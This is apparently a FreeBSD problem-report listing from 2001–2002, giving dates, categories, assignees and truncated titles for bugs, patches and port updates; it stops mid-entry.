[2001/05/11] bin/27268 fdisk does not recognize Linux extended p o [2001/05/11] kern/27269 Cannot mount linux extended (logical) par o [2001/05/11] bin/27270 cg sys/soundcard.h fails to define AFMT_S16_ o [2001/05/12] bin/27281 vidcontrol(1) does not have error codes f [2001/05/12] bin/27283 brian netstat -i missing IPv4 input packet coun o [2001/05/12] bin/27289 green SSH don't do correct diagnostic when no r o [2001/05/12] ports/27291 jim Bluefish port doesn't build mo files o [2001/05/13] i386/27306 mp hw watchpoints work unreliable under gdb o [2001/05/14] bin/27319 obrien df displays amd pid processes o [2001/05/17] kern/27403 lpt driver doesn't handle flags anymore o [2001/05/17] bin/27423 change request o [2001/05/18] kern/27429 'dependant' is a misspelling o [2001/05/18] bin/27433 ps binary does not do what the man page s o [2001/05/20] misc/27471 Linux emulation is missing code needed to o [2001/05/20] ports/27473 jmz when I install the package XFree86-4.0.3_ o [2001/05/20] bin/27483 qa make sysinstall ask for the keymap at ins f [2001/05/22] ports/27542 sobomax xmps should not require gnome o [2001/05/23] kern/27571 bp Changing policy of shadowing files and di o [2001/05/23] bin/27604 change truncate to support low case size o [2001/05/24] i386/27627 machdep.tsc_freq does not exists on machi o [2001/05/25] misc/27633 Mapping for serbian keyboards, follows IS o [2001/05/25] docs/27653 doc Updates to send-pr.html to support MIME o [2001/05/26] docs/27654 doc Update to PR 27653 o [2001/05/26] kern/27660 Kernel does not return error if adding du o [2001/05/26] misc/27677 miss BIND name server library o [2001/05/27] bin/27687 fsck wrapper is not properly passing opti o [2001/05/27] bin/27697 assar trouble compiling libroken f [2001/05/31] gnu/27803 Enhancement to sort(1) o [2001/06/01] misc/27816 rpcgen -b generates server code which doe o [2001/06/01] misc/27829 kris pax's uid/gid cache is read-only a [2001/06/02] docs/27833 cjc No man page for locate.rc o [2001/06/02] kern/27834 Cannot warm-reboot Compaq AP400 due to SC o [2001/06/02] kern/27835 execve() doesn't conform to execve(2) spe s [2001/06/02] docs/27843 alex [PATCH] make.conf WITH_* variables aren't o [2001/06/02] kern/27849 dfr AGP RELEASE ioctl frees memory o [2001/06/04] misc/27872 "Load Config" (sysinstall) hangs Compaq D o [2001/06/06] ports/27903 peter Update: www/transproxy o [2001/06/06] docs/27921 markm manpage skey(1) should be skey(7) o [2001/06/07] alpha/27930 NE2000 not supported on FreeBSD Alpha 4.x o [2001/06/07] ports/27931 ports devel/pth vs. native pthreads conflict fi o [2001/06/07] alpha/27933 alpha Time jitter under load on FreeBSD 4.3 alp a [2001/06/07] ports/27936 mi Update /usr/ports/deskutils/xmdiary 3.0.1 o [2001/06/08] bin/27972 losing information with talk o [2001/06/10] i386/28023 sendmail tries to get the netgraph.ko mod a [2001/06/11] conf/28078 qa /stand/sysinstall skips distro selection a [2001/06/11] conf/28081 murray /stand/sysinstall errs out if /cdrom/ alr o [2001/06/13] ports/28121 sobomax New port: 3D modelling and animation syst o [2001/06/13] ports/28138 tg python os.statvfs module is not functiona a [2001/06/15] bin/28171 des [PATCH] to support a HTTP_REFERER env var a [2001/06/15] gnu/28189 [PATCH] fix for detecting empty CVS commi o [2001/06/16] kern/28206 bp UMAPFS module should depend on NULLFS - p o [2001/06/17] misc/28236 [PATCH] iso-8859-1_to_cp437.scm doesn't c o [2001/06/17] kern/28247 arr ATM/HARP driver for IDT and ForeLE ATM ca o [2001/06/18] misc/28255 picobsd documentation still references ol s [2001/06/18] kern/28260 UIO_MAXIOV needs to be made public o [2001/06/20] bin/28294 dump of vinum based file systems by devic o [2001/06/20] kern/28297 change request for sys/i386/conf/NOTES o [2001/06/21] ports/28332 dwcjr Gimp manual port 1-2 years out of date, m o [2001/06/21] bin/28333 rtprio/idprio setuid problems s [2001/06/22] i386/28346 n_hibma USB ethernet dongle detach requires "ifco o [2001/06/23] bin/28364 lex(1) generated files fail to compile cl o [2001/06/23] ports/28365 wosch Typical use of portchecheckout breaks int o [2001/06/23] docs/28371 phk malloc(2) man page correction o [2001/06/26] bin/28435 [patch] allow newsyslog to signal process o [2001/06/27] bin/28449 cracauer sh(1) aborts on certain input p [2001/06/27] misc/28455 GNU readline should be updated to 4.2 o [2001/06/27] misc/28456 german keymap with dead keys o [2001/06/27] ports/28471 keith no iso8859 font o [2001/06/28] misc/28494 n_hibma ugen usable only from "attach" or by usbd o [2001/06/29] misc/28529 runetype.h doesn't have C++ 'extern "C"' o [2001/06/30] docs/28555 doc [PATCH] style(9) isn't explicit about boo o [2001/06/30] kern/28566 bp Mount_null loopbacks can hang startx temp o [2001/07/01] bin/28620 ru xinstall has no way to pass options to st o [2001/07/02] ports/28644 jmz Make error when rebuilding xdvi o [2001/07/03] ports/28678 wosch portcheckout doesn't allow flexible build o [2001/07/03] kern/28681 sos ATAPI MO drive support o [2001/07/03] ports/28682 portmgr Some port install builds fail if silent ( o [2001/07/04] docs/28699 doc strptime(3) %d format specifier not compl o [2001/07/05] ports/28717 kuriyama net/net-snmp stop enumerate interfaces wh o [2001/07/06] ports/28771 ports opendx server fails to start o [2001/07/07] bin/28789 /usr/bin/last does not filter for uucp co o [2001/07/07] ports/28803 cy ports/comms/conserver does not support ## o [2001/07/08] ports/28810 lioux qpopper 4.0.3 + PAM modification; HAVE_SH o [2001/07/10] ports/28887 brian [PATCH] sandbox for httptunnel! o [2001/07/10] kern/28888 Acer 8000 NIC not detected correctly o [2001/07/11] misc/28890 merge.c compares int i against size_t siz o [2001/07/13] misc/28938 small PicoBSD - An update to the build script t a [2001/07/13] docs/28949 phk the mknod(8) man page stills refers to bl o [2001/07/14] bin/28972 dwmalone gamma returns same result as lgamma o [2001/07/14] i386/28975 mjacob RocketPort problems o [2001/07/14] misc/28980 Fujitsu/Siemens Lifebook E-6540 stalls wh o [2001/07/15] bin/28988 We need more simple message digesting too f [2001/07/15] docs/28994 dd New article for docproj "Checkpoint VPN-1 o [2001/07/18] bin/29062 markm krb4 and krb5 multiply defined version sy o [2001/07/18] bin/29071 relay patch for rwhod o [2001/07/19] misc/29077 At loading notebook pccardd not correctly o [2001/07/19] misc/29089 Some kind of fsbn0 error... o [2001/07/20] misc/29103 make (1) dump core while processing ^C fr o [2001/07/21] bin/29119 menu of fdisk editor in 4.3R does not lis o [2001/07/22] ports/29154 nik TeX resource settings from MAKE_ENV in pr o [2001/07/23] bin/29164 maxim [PATCH] lack of 'Do not fragment' flag in o [2001/07/23] conf/29167 rc.pccard doesn't check /var/run/pccardd. o [2001/07/23] kern/29169 mjacob FC loop that 'goes away' never times out o [2001/07/23] bin/29175 tmm [PATCH] rpcgen(1) and inetdflag/pmflag su o [2001/07/23] bin/29177 [PATCH] rpc client create functions with o [2001/07/24] ports/29199 sobomax jdk12beta port should register open-motif o [2001/07/25] ports/29223 portmgr cyrus-imapd and postfix master.8 manpage o [2001/07/25] kern/29233 VIA 82C686 AC97 codec gets probed as 'chi o [2001/07/26] docs/29245 doc top(1) manpage doesn't understand SMP o [2001/07/27] kern/29264 Recovery from LIPs on FCAL using isp not a [2001/07/28] misc/29292 sos The functional addtion to burncd(8) o [2001/07/29] ports/29298 cpiazza Installation of documentation for vcdgear o [2001/07/29] alpha/29299 alpha FreeBSD 4.3 Alpha + Tekram SCSI adapter p o [2001/07/29] kern/29307 NIC Initialization fails on dual CPU syst o [2001/07/29] misc/29312 sound Using mixer on pcm misbehaves with onboar f [2001/07/29] kern/29318 mjacob Exabyte 8200 needs SA_QUIRK_1FM and SA_QU o [2001/07/30] gnu/29331 still documented broken options in gcc ma o [2001/07/30] ports/29343 ports new postgresql7 port feature o [2001/07/31] kern/29355 mux [patch] lchflags support o [2001/08/01] bin/29361 startslip can't load if_sl.ko o [2001/08/01] bin/29363 [PATCH] newsyslog can support time as ext o [2001/08/02] ports/29392 portmgr Small built-time glitch in Makefile for a o [2001/08/02] kern/29395 reaction on ctrl-alt-del - poweroff, halt o [2001/08/03] kern/29423 [PATCH] kernel security hooks implementat o [2001/08/07] kern/29499 dwmalone it is not possible to send creditionals o [2001/08/07] bin/29516 markm telnet from an non FreeBSD host still use o [2001/08/07] ports/29519 ports X11 ports generate undef pthread refs wit o [2001/08/07] misc/29529 dcs Boot prompt "?" command doesn't list "boo f [2001/08/08] kern/29538 joerg Mounting /dev/fd0 never completes o [2001/08/08] misc/29550 duplicate pings jinside of vmware 2.0 f [2001/08/09] docs/29571 doc [PATCH] No man page for pgrp kernel funct o [2001/08/09] bin/29581 proposed gethostbyXXXX_r() implementation f [2001/08/09] ports/29590 ports [new port] www/parser-bin One more server o [2001/08/11] kern/29621 n_hibma Missing man page for ulpt a [2001/08/12] i386/29639 murray entry for zip 250 drives in /etc/disktab f [2001/08/13] ports/29691 portmgr New port variable USE_COMPAT_LIB - bsd.po o [2001/08/14] kern/29698 linux ipcs doesn'work o [2001/08/15] kern/29727 amr_enquiry3 structure in amrreg.h (amr d o [2001/08/15] ports/29732 sobomax linking error f [2001/08/16] kern/29777 n_hibma kernel uscanner.c contains wrong vendor a f [2001/08/17] docs/29807 dd [PATCH] XFREE86_VERSION is undocumented f [2001/08/18] bin/29850 markm ftpd.c doesn't check via PAM/pam_acct_mgm f [2001/08/18] ports/29856 portmgr make extract of cyrus did an install of c o [2001/08/19] conf/29870 rc.diskless2 uses /usr/sbin/mtree before o [2001/08/19] kern/29875 CURRENT driver for Tekram DC395X and DC31 o [2001/08/20] misc/29893 qa suggestions for 4.4 sysinstall o [2001/08/20] bin/29897 markm pam_unix patch, which uses loginclass pas o [2001/08/20] kern/29915 kernel panics on interaction with mlock a o [2001/08/21] ports/29929 ports wginstall.pl script chokes on calculated o [2001/08/22] bin/29961 ru A4 paper size for groff knob for /etc/mak o [2001/08/22] kern/29962 sent broadcast packets get spurious 4 byt a [2001/08/23] docs/30008 doc This document should be translated, comme o [2001/08/24] kern/30052 dc(4) driver queues outgoing pkts indefin o [2001/08/25] docs/30082 jkoshy Dead URL on website o [2001/08/27] ports/30148 portmgr devel/libtool: shared libs with compaq-cc o [2001/08/28] kern/30160 Kernel panic when flash disk is removed a f [2001/08/28] ports/30166 ports ports/net/nettest2001 o [2001/08/28] kern/30179 FreeBSD 5.0 install hangs: deviceTry: mak o [2001/08/29] misc/30186 getaddrinfo does not handle incorrect ser o [2001/08/29] kern/30200 yokota Bug in psm in 4.4-RC o [2001/08/29] ports/30201 msmith editors/wordperfect in ports is not usabl o [2001/08/29] i386/30206 PS/2 server 85 can't boot kern.flp o [2001/08/29] misc/30213 Fatal Errors of Server Programe o [2001/08/30] misc/30224 No irq - PCI wi card doesn't allow interu o [2001/09/01] bin/30247 sh cannot redirect to /dev/fd/1 or from / o [2001/09/01] docs/30253 bp [PATCH] mount_unionfs(8) and mount_nullfs o [2001/09/01] kern/30257 apm enabled kernel panics (4.4-RC) o [2001/09/02] ports/30264 greid Update port: graphics/xawtv o [2001/09/03] ports/30298 chuckr [PATCH] a2ps-4.13 can't cope with ENOMEM o [2001/09/03] conf/30301 Default printcap "mx" config too small o [2001/09/04] misc/30320 n_hibma USB mouse does not work after return'ing o [2001/09/04] bin/30321 strftime(3) '%s' format does not work pro o [2001/09/05] bin/30334 mount_nfs ignores acregmin, acregmax, axd o [2001/09/05] conf/30341 be keymap: wrong Capslock behaviour with o [2001/09/05] bin/30360 vmstat returns impossible data o [2001/09/06] bin/30392 sh: incorrect value of $? in here-documen o [2001/09/07] misc/30412 rtdl/dlopen() fails to merge common varia o [2001/09/07] kern/30422 WDT hardware watchdog driver & daemon o [2001/09/07] bin/30424 Generalization of vipw to lock pwdb while f [2001/09/08] conf/30441 Can't set interface arguments for dhcp co o [2001/09/08] docs/30442 doc remove broken referemce to gettime(9) fro o [2001/09/08] docs/30443 keramida remove broken reference to kerberos(1) fr o [2001/09/08] docs/30444 keramida remove broken references to gated(8) and o [2001/09/09] i386/30461 sound no audio cd with cmi8330 o [2001/09/09] bin/30464 pthread mutex attributes -- pshared f [2001/09/09] bin/30471 brian periodic script output to a file always a o [2001/09/10] bin/30484 rpc.rstatd consumed lots of open file des o [2001/09/10] ports/30499 portmgr libtool-1.4.1 port diffs o [2001/09/11] i386/30503 imp stray pccard card insertion events after o [2001/09/11] kern/30510 no apm for VIA KT133A chipset o [2001/09/11] misc/30517 using sysinstall with install.cfg has no o [2001/09/12] misc/30526 inserting a Sony Ninja-ATA pcmcia style c o [2001/09/12] kern/30541 imp [PATCH] old pccard beep depends on value o [2001/09/12] bin/30542 [PATCH] add -q option to shut up killall o [2001/09/13] docs/30556 doc vnconfig man page incorrect; functionalit o [2001/09/13] kern/30570 boot loader don't reacts on USB keyboard o [2001/09/14] ports/30573 nakai /usr/X11R6/bin/xfce_setup does not create o [2001/09/16] kern/30608 kern.ps_showallproc=0 doesn't limit queri o [2001/09/16] docs/30618 keramida ediff man page incomplete o [2001/09/17] kern/30634 kevent.data value incorrect for UDP socke o [2001/09/17] bin/30639 apmd crashes on SIGHUP (under certain con o [2001/09/17] bin/30640 apmd does not terminate properly on SIGTE o [2001/09/18] bin/30661 FreeBSD-current fails to do partial NFS f o [2001/09/20] misc/30683 [PATCH] loader(8) fails to load module wh a [2001/09/20] bin/30685 cjc Patch for usr.bin/hexdump o [2001/09/20] ports/30698 ports New port: news/pl-slrn o [2001/09/20] i386/30700 sound Applications cannot synchronize sound usi o [2001/09/20] ports/30701 ports setiathome port misuses the 'nobody' user o [2001/09/21] ports/30707 ports midnight commander can't handle correctly o [2001/09/22] ports/30732 obrien bash2 - pkg-plist fix and sample files ad a [2001/09/22] bin/30737 murray sysinstall leaks file descriptors on rest o [2001/09/23] ports/30754 nakai x11/dgs port overwrites a number of files o [2001/09/23] ports/30777 portmgr add a 'make pkg-plist' make target in por o [2001/09/23] misc/30778 termcap problem with wyse-60 terminal o [2001/09/24] ports/30788 sobomax compile works, install fails of graphics/ o [2001/09/24] kern/30794 sound ESS Solo-1 does not work after suspend/re o [2001/09/25] bin/30812 giant termcap database update o [2001/09/25] bin/30819 /bin/mv results in warnings when /bin/cp o [2001/09/25] kern/30836 wpaul Chipset SiS735 / NIC SiS 900 o [2001/09/26] ports/30848 roam courier imapd won't compile with vpopmail o [2001/09/26] bin/30854 bootpd/bootpgw change - skip ARP modifica o [2001/09/26] misc/30857 intr_machdep.c allows access out of array f [2001/09/26] i386/30860 While install after "Mounting root from u o [2001/09/27] bin/30863 bootpd/dovend.c Win95 compatibility impro f [2001/09/27] ports/30870 ports httpd in free(): warning: recursive call o [2001/09/27] docs/30873 doc ``ip'' man page does not specify byte ord o [2001/09/29] bin/30907 green [PATCH] ssh configuration oddities o [2001/09/29] ports/30923 obrien small fix for devel/gindent port o [2001/09/30] ports/30929 brian [net/pppoa] use usbd to initialize USB AD o [2001/09/30] ports/30936 taoka pips-sc880 installed script contains inco o [2001/09/30] conf/30938 Improving behavior of /etc/periodic/daily o [2001/09/30] kern/30951 Optimize page queue scan on miss of speci o [2001/10/01] alpha/30970 alpha Ensoniq 1371 (Creative chipset) does not o [2001/10/01] bin/30972 peter nfsd and mountd are in the wrong location o [2001/10/01] ports/30979 ports New port for "txfonts" TeX's font package o [2001/10/02] ports/30983 portmgr [PATCH] Some staroffice cdrom fixes o [2001/10/03] ports/31013 obrien John The Ripper Package Lists Bad Path o [2001/10/04] bin/31034 regularly add original address logging fo o [2001/10/04] kern/31043 Missing Ptrace functionality in Linuxulat o [2001/10/04] kern/31048 linprocfs:/proc/meminfo cannot handle mul o [2001/10/04] bin/31052 fenner Traceroute needs update f [2001/10/05] ports/31061 ports New port: security/gnupg-devel o [2001/10/06] bin/31088 tobez Make whereis.pl use strict, and a couple o [2001/10/07] misc/31097 main thread will accept() failure when so o [2001/10/07] docs/31109 doc replace gif images w/ png ones due to pat o [2001/10/08] bin/31135 /bin/df reporting 'NaNB' as a Size. f [2001/10/09] ports/31159 cpiazza gmixer 0.98c dumps core with some mixers o [2001/10/09] docs/31164 doc man page for strftime is incorrect o [2001/10/10] bin/31199 tunefs error is incorrect when enabling s o [2001/10/10] conf/31200 Modification of rc.diskless1 needs change o [2001/10/10] bin/31201 [patch] add free_space(chunk) to libdisk o [2001/10/10] docs/31210 peter cvs info page missing -R f [2001/10/11] ports/31222 ports ports:astro/SETIsupport(version is wrong) o [2001/10/11] ports/31229 ports new port: astro/linux-setiathome-i686 o [2001/10/13] kern/31255 select with zero timeout returns 0 even w o [2001/10/14] docs/31264 jdp cvsup(1) "base" option and keyword descri a [2001/10/14] docs/31271 doc rl(4) discourages vender openness by disp o [2001/10/15] ports/31282 ports NEW PORT: aolserver+ad o [2001/10/15] misc/31297 yokota New screen blanker module for syscons o [2001/10/18] i386/31353 'shutdown -p' does not work on SMP Tyan T o [2001/10/19] kern/31367 General boot fault during mounting root w o [2001/10/19] ports/31369 adrian New KMerlin Port o [2001/10/19] docs/31370 fenner typo in tcpdump manpage o [2001/10/19] misc/31380 NFS rootfs mount failure message too cryp o [2001/10/20] bin/31387 When getuid()=0, mailwrapper should drop o [2001/10/20] ports/31389 portmgr tidy readme templates + port readme enhan o [2001/10/21] i386/31427 minor incorrect code in sys/i386/i386/pma o [2001/10/22] bin/31432 umount(8) and unmount(2) don't corespond o [2001/10/22] kern/31445 sound cat sound.au > /dev/audio fails for sound a [2001/10/23] kern/31455 n_hibma [PATCH] ohci driver probrem when send dat o [2001/10/23] kern/31456 Register number definition for AMD PCnet o [2001/10/23] ports/31462 peter rdist6 does not like accounts with '.' in o [2001/10/25] ports/31486 kuriyama ports/palm/prc-tools-gcc does not build m f [2001/10/25] ports/31487 dinoex licq-qt-gui plugin does not parse local a o [2001/10/25] kern/31490 Panic in sysctl_sysctl_next_ls on empy no o [2001/10/26] kern/31521 cg pcm0 plays too fast on Intel 82801BA (ICH o [2001/10/27] i386/31535 Can't reboot system: Tyan Thunder K7+ Dua o [2001/10/28] conf/31555 rc.syscons does not run standalone f [2001/10/28] ports/31579 kde kdessl of kde-2.2.1 wants to link to libs o [2001/10/29] bin/31588 change request to allow mount(1) to set t a [2001/10/29] ports/31591 kde kdeinit crashes when I close KDE2 session o [2001/10/29] kern/31624 writev may return undocumented ECONNRESET o [2001/10/30] ports/31630 jmz Port se-ispell install the dictionary in o [2001/10/30] bin/31632 ip6fw error under DNS dislabled environme o [2001/10/30] docs/31640 charnier Avoiding uppercase program names in manpa o [2001/10/30] kern/31647 socket calls can return undocumented EINV o [2001/10/30] docs/31653 doc Chapter 14 of the Handbook lacks content o [2001/10/31] ports/31669 ports New port: graphics/xawtv_applet o [2001/10/31] ports/31684 ports ports/comms/hylafax fixes o [2001/11/01] i386/31686 Problem with the timestamp option when fl o [2001/11/02] kern/31708 VM system / fsync / flushing delayed inde o [2001/11/02] kern/31711 Enhancements and bug fixes to Aironet dri o [2001/11/02] i386/31716 FreeBSD uses broken tsc timecounter by de f [2001/11/03] ports/31744 ports New port: emulators/minix (2.0.0) o [2001/11/05] gnu/31772 New option in dialog(1) s [2001/11/06] ports/31809 kde [UPDATE] qt23 port to qt-2.3.2 f [2001/11/08] ports/31858 ports New port: pike 7.2.234 (current CVS versi o [2001/11/09] misc/31890 new syscons font o [2001/11/10] bin/31906 No method available to unwind atexit(3) s o [2001/11/11] ports/31910 greid comms/sms_client o [2001/11/12] ports/31926 ports New port security/drweb-qmail: Qmail mess o [2001/11/12] bin/31933 dillon pw can interpret numeric name as userid d a [2001/11/12] ports/31943 dirk mysql323-server port hostname look up fai o [2001/11/12] ports/31944 portmgr bsd.port.mk: USE_XPM (implied by USE_MOTI o [2001/11/13] kern/31971 microuptime() went backwards when apm is o [2001/11/14] misc/31981 (mis)feature in getnetent parsing -- comm o [2001/11/14] bin/31985 New /etc/remote flag for tip to append LF o [2001/11/14] bin/31987 patch to allow dump(1) to notify operator s [2001/11/15] i386/32014 ppi locks up system during boot o [2001/11/15] ports/32015 kuriyama ports/palm/pilrc bugs o [2001/11/15] docs/32020 doc loader.8 manpage missing tunables o [2001/11/16] ports/32039 greid UPDATE devel/asmutils 0.14 -> 0.15 a [2001/11/16] docs/32041 doc Add point about net.inet.tcp.portange.{fi o [2001/11/16] docs/32054 doc inconsistency between index.3 and rindex. o [2001/11/17] conf/32067 Problems with spanish keyboard in console o [2001/11/18] bin/32092 crypt pickups the wrong password format o [2001/11/19] conf/32108 Proposed Firewall (IPv4) configuration sc o [2001/11/19] ports/32114 portmgr WRKDIRs should be moved to a central loca a [2001/11/19] misc/32120 PR misc/24324 errata o [2001/11/19] ports/32122 jmz xf86cfg graphics-mode fails on Samsung Sy o [2001/11/20] bin/32126 getopt(3) not Unix-98 conformant f [2001/11/20] misc/32144 murray unattended install with sysinstall doesn' o [2001/11/20] ports/32145 jmz XFree86 doesn't ldconfig itself o [2001/11/20] ports/32147 kris mindguard port dumps core o [2001/11/21] ports/32174 portmgr Autoconf patch for bsd.port.mk o [2001/11/22] ports/32202 ports ports/devel/py-htmlkit distribution does o [2001/11/23] misc/32210 System hangs while kernel waiting for SCS o [2001/11/23] ports/32232 dirk Update and bugfix port: www/mod_php4 o [2001/11/23] ports/32243 sobomax ports/py-wxPython fails to compile o [2001/11/24] i386/32251 bugfix and new feature for apmd o [2001/11/24] ports/32258 scrappy converters/p5-Convert-ASN1 out of date o [2001/11/24] ports/32259 scrappy Update security/p5-IO-Socket-SSL request f [2001/11/25] ports/32273 kde kdm doesn't set paths from login.conf o [2001/11/26] conf/32288 After install: /etc/rc complains if crypt o [2001/11/26] bin/32299 peter nm coredumps on sendmail in -current o [2001/11/26] i386/32301 dfr Fix for agpgart for the AMD-751 and relat o [2001/11/26] ports/32317 petef Request for linux-qt port o [2001/11/26] bin/32318 cjc no userland tool available to test resolv f [2001/11/28] ports/32361 ports port doesn't work, www/mod_log_mysql o [2001/11/28] ports/32362 ports postgresql7 port should install more *.h a [2001/11/29] conf/32375 murray sysinstall doesn't respect User generated o [2001/11/30] misc/32400 rwhod - option to specify hostname o [2001/11/30] ports/32405 dirk Japanese encoding translation support for a [2001/11/30] bin/32411 shutdown's absolute-time handling could b o [2001/12/01] docs/32425 doc Document cvs update `P file' output o [2001/12/01] bin/32433 Cannot specify files beginning with + on o [2001/12/02] ports/32444 dirk www/mod_php4: ctype support o [2001/12/03] docs/32468 doc broken link in handbook: sysutils/mkisofs o [2001/12/03] kern/32478 scsi/NIC drivers fail when using SMP kern o [2001/12/03] misc/32480 Missing graphic characters in syscons fon o [2001/12/04] bin/32501 quot(8) is stupid regarding the filesyste o [2001/12/04] ports/32502 dima port update palm/pilot-link to 0.9.6 o [2001/12/04] ports/32508 ports www/flashplugin-mozilla has malloc bug o [2001/12/04] ports/32517 green Update port: emulators/snes9x to 1.39 s [2001/12/07] ports/32572 kde net/kio_fish: konq has no icons for fish: s [2001/12/07] docs/32578 doc A _really_ petty change to the front page o [2001/12/07] ports/32582 greid Update port: audio/tempest_for_eliza o [2001/12/07] bin/32588 grog operator should backup vinum vols o [2001/12/08] ports/32604 portmgr Many ports which depends on apache don't f [2001/12/08] misc/32605 nsouch SMBus driver broken o [2001/12/09] ports/32651 ache a small patch to obtain socks5 support to o [2001/12/09] kern/32652 joe A new ioctl to uscanner s [2001/12/09] ports/32653 joe Added patches to improve USB scanner supp f [2001/12/09] bin/32657 sed file handing is non-standard o [2001/12/09] kern/32659 dillon VM and VNODE leak with vm.swap_idle_enabl o [2001/12/09] gnu/32661 dd send-pr uses $LOGNAME for From and Reply o [2001/12/09] docs/32662 dd arp(8) uses "this host" with two differen o [2001/12/10] i386/32666 imp mbufs leaks in dev/ed o [2001/12/10] bin/32667 systat waste too much time reading input o [2001/12/10] kern/32671 imp Patch to generate usbdevs.h automatically o [2001/12/10] docs/32674 doc no man page for the ntp_adjtime system ca a [2001/12/10] bin/32675 kris openssl dhparam hangs when using /dev/ran o [2001/12/10] kern/32677 pciconf -l opens /dev/pci for read/write o [2001/12/10] misc/32680 [PATCH] Allows users to start jails by ho o [2001/12/12] ports/32762 ache Update for archivers/xpk o [2001/12/13] kern/32799 ucom and uplcom drivers ported from NetBS o [2001/12/13] bin/32808 dwmalone [PATCH] tcpd.h lacks prototype for hosts_ o [2001/12/13] kern/32812 roger bktr driver missing tuner for eeprom dete o [2001/12/14] bin/32828 phk w incorrectly handles stale utmp slots wi o [2001/12/15] kern/32880 ambrisko Update aironet driver to correct signal s o [2001/12/16] gnu/32902 Incremental tar archiving using GNU style o [2001/12/16] kern/32912 msmith options misssing TCBHASHSIZE o [2001/12/16] ports/32917 portmgr installing ports may fail if $GREP_OPTION o [2001/12/17] bin/32935 /bin/sh buildin echo command have invalid o [2001/12/17] ports/32936 mharo ports/security/keyprint only supports S/K o [2001/12/18] conf/32976 assar Kerberos5 config files not installed by d o [2001/12/18] docs/32979 assar manpages are not installed for k5admin an o [2001/12/18] ports/32999 ports New ports: devel/ORBacus4 o [2001/12/19] kern/33004 n_hibma Patch for USB (uhci) o [2001/12/19] misc/33007 n_hibma umass device timeout after successive use o [2001/12/19] misc/33013 cg mixer does not have treble/bass for Sound o [2001/12/19] kern/33014 installkernel without buildkernel gives c o [2001/12/19] conf/33018 Patch for RC (add multiple SSHD configura o [2001/12/21] bin/33066 rwatson sysinstall does not write to new disks as o [2001/12/22] i386/33097 sound Crystal 4237b mixer problems o [2001/12/23] ports/33108 portmgr Generate an error if WRKDIRPREFIX == /usr o [2001/12/23] kern/33117 empty struct md_coredump in pcb.h and use o [2001/12/23] kern/33124 jhb kthread_create doesnt mark kthreads as kt o [2001/12/23] bin/33133 keyinit outputs wrong next login password o [2001/12/23] ports/33134 keith update port: chinese/ghostscript6 for Ado o [2001/12/25] gnu/33182 mp gdb seg faults when given handle SIGALRM o [2001/12/26] ports/33196 portmgr duplicate lines in /usr/ports/INDEX o [2001/12/26] kern/33202 msmith sys/dev/mly/mly.c minor mly_printf cosmet o [2001/12/26] kern/33203 dillon "got bad cookie" errors on NFS client o [2001/12/26] ports/33224 me Build breaks on CURRENT due to 0 o [2002/02/01] ports/34523 ports man pages of nwclient602 install to wrong o [2002/02/01] docs/34529 doc [patch] Grammar nits in usbd.conf(5) and f [2002/02/01] i386/34537 The second NIC card could not get configu o [2002/02/01] gnu/34538 mp_set_memory_functions not extern "C"'d o [2002/02/01] docs/34547 keramida [patch] edits of FAQ Introduction o [2002/02/02] ports/34550 ports ghostscript-gnu-nox11 portversion 6.51 fa o [2002/02/02] ports/34565 ports graphics/blender port is broke o [2002/02/03] docs/34577 doc Some man pages still advise using "confli o [2002/02/03] kern/34591 ICMP bandwidth limiting does not indicate f [2002/02/03] misc/34596 slow gettimeofday in FreeBSD 4.5 o [2002/02/03] ports/34597 eivind [PATCH] Update ports/mail/isync to 0.8 s [2002/02/04] misc/34621 billf i have a patch for (lol) /usr/games/fish o [2002/02/04] docs/34626 doc Copyright on "Index of /mail/current" pag o [2002/02/04] bin/34628 sobomax pkg-routines ignore the recorded md5 chec o [2002/02/04] bin/34629 des fetch(1) cannot download RH 7.2 ISOs from o [2002/02/05] ports/34635 ports games/flightgear o [2002/02/05] kern/34637 LINT is wrong -- NMBCLUSTERS doesn't auto o [2002/02/05] misc/34642 Windows 2000 will not dual boot with Free o [2002/02/05] docs/34654 doc Update UIDs for porters handbook o [2002/02/06] ports/34659 reg Proposed change to Mozilla port's Makefil o [2002/02/06] kern/34665 darrenr ipfilter rcmd proxy "hangs". o [2002/02/06] misc/34673 Second call to select() waits ~100ms befo o [2002/02/06] bin/34676 obrien dhclient always in -q quiet mode (PATCH E o [2002/02/07] gnu/34709 [patch] Inaccurate GDB documentation o [2002/02/07] kern/34712 [patch] SCSI quirk for USB Memorybird o [2002/02/07] ports/34714 ache unzip(1) breaks filenames in non-ASCII ch o [2002/02/07] ports/34717 portmgr bsd.port.mk: extraneous quotes in PTHREAD o [2002/02/07] ports/34718 portmgr make fetch-list includes things make fetc f [2002/02/07] bin/34728 murray DHCP hostname set as Hexadecimal string o [2002/02/08] conf/34729 sheldonh treat smbfs as network file system in /et o [2002/02/08] ports/34737 ports New port: graphics/lodju o [2002/02/08] ports/34742 obrien bash2 missing build dependency on autocon o [2002/02/08] kern/34747 joe Please add USB floppy entry o [2002/02/09] misc/34759 Phantasia does not accept [enter] key o [2002/02/09] ports/34760 ports New port: net/dstumbler a curses based ap o [2002/02/09] conf/34776 rc.diskless1 creates insufficiently sized o [2002/02/10] misc/34788 dwmalone dmesg issues with console output o [2002/02/10] kern/34789 joe PNY brand USB flash readers need 10 byte o [2002/02/10] ports/34796 jmz wrong path in /etc/XF86Config (purely cos o [2002/02/10] ports/34809 ports german/bbbike update o [2002/02/10] ports/34815 lioux new port: freenet, the anonymous internet o [2002/02/11] kern/34820 FreeBSD should be able to beep after shut o [2002/02/11] bin/34832 /usr/share/man/cat3/setkey.3.gz linked to o [2002/02/11] bin/34834 "fix" of du(1) and -h o [2002/02/11] ports/34841 dirk Adding cyrus to mod_php o [2002/02/11] bin/34843 fenner `tcpdump port echo' filters for port 4 in o [2002/02/11] misc/34850 scp cannot talk to ssh2 sites that have S o [2002/02/11] kern/34854 /src/sys/dev/sound doesn't work correctly o [2002/02/12] ports/34870 ports new port: lang/pnetlib o [2002/02/12] bin/34874 Netstat output to small o [2002/02/12] ports/34878 chern sysinstall o [2002/02/12] kern/34880 Impossibility of grouping IP into a pipe o [2002/02/13] bin/34919 portmap can not exclusively bind to 127.0 o [2002/02/13] misc/34924 kscd crash on startup signal 11 o [2002/02/14] ports/34928 ports New port for cppunit f [2002/02/14] misc/34935 New locale (Cyrillic Windows Codepage 125 o [2002/02/14] kern/34942 Attempt to play -> "pcm0: play interrupt o [2002/02/14] alpha/34948 alpha Promise TX2 ATA133 controller doesnt work o [2002/02/14] kern/34952 Mouse cursor invisible with USB mice and o [2002/02/15] bin/34955 doc [PATCH] ps(1) is out of touch with realit o [2002/02/15] kern/34963 identify procs belonging to the same jail o [2002/02/15] 